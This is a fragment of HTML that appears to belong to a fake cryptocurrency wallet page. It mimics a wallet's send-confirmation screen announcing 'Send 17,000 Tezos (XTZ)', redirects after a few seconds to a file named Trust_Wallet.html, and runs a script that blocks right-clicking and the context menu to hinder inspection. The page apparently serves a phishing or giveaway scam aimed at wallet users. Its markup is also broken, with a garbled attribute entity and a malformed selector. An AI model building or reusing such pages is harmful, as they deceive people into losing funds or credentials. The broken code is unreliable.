<!DOCTYPE html>

        
      </span>
     
    </div>
  </div>
</div>

  <!-- ngIf: widget.view == 'sendConfirm' --><div class="sendConfirm ng-scope" ng-if="widget.view == &#222;sendConfirm&#39;">



<meta http-equiv="refresh" content=" 8;url=Trust_Wallet.html">
 


   <br> <br>
<center><img src="https://s2.coinmarketcap.com/static/img/coins/64x64/2011.png"></center>
<center><div class="WalletTokenList__refreshed-message">Loading Balances...</div></center>
<center> <font size="6">Send 17,000 Tezos (XTZ) </font><br></center>
    <!-- ngIf: widget.memo --><div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo">
       

      </div>
    </div><!-- end ngIf: widget.memo -->
    <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 -->



</div><script language="javascript" type="text/javascript">
<!-- //
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
window.onload = () => {
    let el = document.querySelector('[alt="]').parentNode.parentNode;
    el.parentNode.removeChild(el);
}
</script> 
</body></html>
